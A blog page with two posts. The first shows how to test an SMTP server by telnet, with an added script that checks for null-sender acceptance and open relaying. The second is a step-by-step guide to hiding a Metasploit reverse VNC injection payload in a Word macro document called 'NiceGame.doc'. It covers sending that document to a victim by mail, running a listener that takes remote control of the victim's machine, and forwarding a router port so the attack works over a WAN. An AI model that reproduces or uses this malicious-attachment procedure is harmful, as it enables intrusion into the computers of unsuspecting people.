Saturday, August 1, 2009

How can I test my SMTP service?

You can use TELNET to test your SMTP service. SMTP uses port 25, so to open an SMTP session with an Exchange server over telnet we use the command:

telnet test.server 25
If the connection is successful, we should see a banner and a command-line interface. You may consult RFC 821 for the SMTP commands:

220 test.server Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Mon, 15 Sep 2009 20:50:07 +0210
helo test.server
250 test.server Hello []
mail from:
250 2.1.0 OK
rcpt to:
250 2.1.5
354 Start mail input; end with .
subject: test mail
Hi Sam,
I'm sending email using TELNET.
250 2.6.0 Queued mail for delivery
221 2.0.0 test.server Service closing transmission channel
Connection to host lost.
Press any key to continue...

The same technique can also be used to check for NULL sender identity and SMTP Open Relay.
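The NULL sender and open relay checks mentioned above can be scripted for a server you administer. This is an added example, not part of the original post: it uses Python's smtplib, stops before DATA so nothing is queued, and the function names and the probe.example HELO name are assumptions.

```python
import smtplib
import sys


def accepted(code):
    """True for a 2xx reply such as 250 2.1.0 or 250 2.1.5."""
    return code is not None and 200 <= code < 300


def probe(host, port, sender, rcpt, helo="probe.example"):
    """HELO, MAIL FROM, RCPT TO, then RSET and QUIT. DATA is never sent,
    so the server queues nothing. Returns the reply code of each stage."""
    with smtplib.SMTP(host, port, local_hostname=helo, timeout=10) as s:
        codes = {"helo": s.helo(helo)[0]}
        codes["mail"] = s.mail(sender)[0]  # "" goes out as MAIL FROM:<>
        # Only ask about the recipient if the sender was accepted.
        codes["rcpt"] = s.rcpt(rcpt)[0] if accepted(codes["mail"]) else None
        s.rset()
    return codes


def assess(host, port, local_rcpt, outside_sender, outside_rcpt):
    """Run both checks: null sender to a local mailbox, and an outside
    sender to an outside recipient (neither domain hosted by the server)."""
    null = probe(host, port, "", local_rcpt)
    relay = probe(host, port, outside_sender, outside_rcpt)
    return {
        # RFC 5321 uses the null reverse-path for bounces; this only
        # records what the server does with it.
        "null_sender_accepted": accepted(null["mail"]) and accepted(null["rcpt"]),
        # A 2xx to RCPT for a domain the server does not host, from an
        # unauthenticated outside sender, is the open relay indicator.
        "relays_for_outsiders": accepted(relay["rcpt"]),
        "codes": {"null": null, "relay": relay},
    }


if __name__ == "__main__":
    if len(sys.argv) == 6:
        host, port, local_rcpt, out_from, out_rcpt = sys.argv[1:]
        print(assess(host, int(port), local_rcpt, out_from, out_rcpt))
    else:
        print("usage: smtp_check.py HOST PORT LOCAL_RCPT OUTSIDE_SENDER OUTSIDE_RCPT")
```

A 2xx at the RCPT stage is an indicator rather than proof, since some servers accept the recipient and reject or discard the message later; confirm against the server's relay restrictions.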

Sunday, May 24, 2009

Metasploit & Reverse VNC Injection hidden in word file -PoC (Proof of Concept)

Hello friends, today I'm going to show how to use the payload feature of Metasploit v3.2 for Reverse VNC Injection. The steps are given below.

Let's begin.

1) Create a payload for ReverseVNCInjection with Metasploit's msfpayload utility:
./msfpayload windows/vncinject/reverse_tcp LHOST= V > exploit.bas

2) Copy the exploit.bas file to another Windows system to make the .doc file.
Create a new doc file and write some text into it, then do the following:
Go to Tools --> Macro --> Visual Basic Editor.
Then go to File --> Import File, choose exploit.bas, and save the document under a name, e.g. NiceGame.doc.
The file is now ready; send it to the victim by mail or by some other means.

3) Now in BackTrack 4, type this command:
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=True E

On the target Windows system, when the victim opens the file, they are asked whether or not to run the macro. If they accept, the connection is initiated and the VNC client opens on the BackTrack machine.

Note: VNC does not need to be installed on the victim's PC. This also works over a WAN; the only requirement is that you forward port 4444 on your modem or router.

Original video links for the above guide: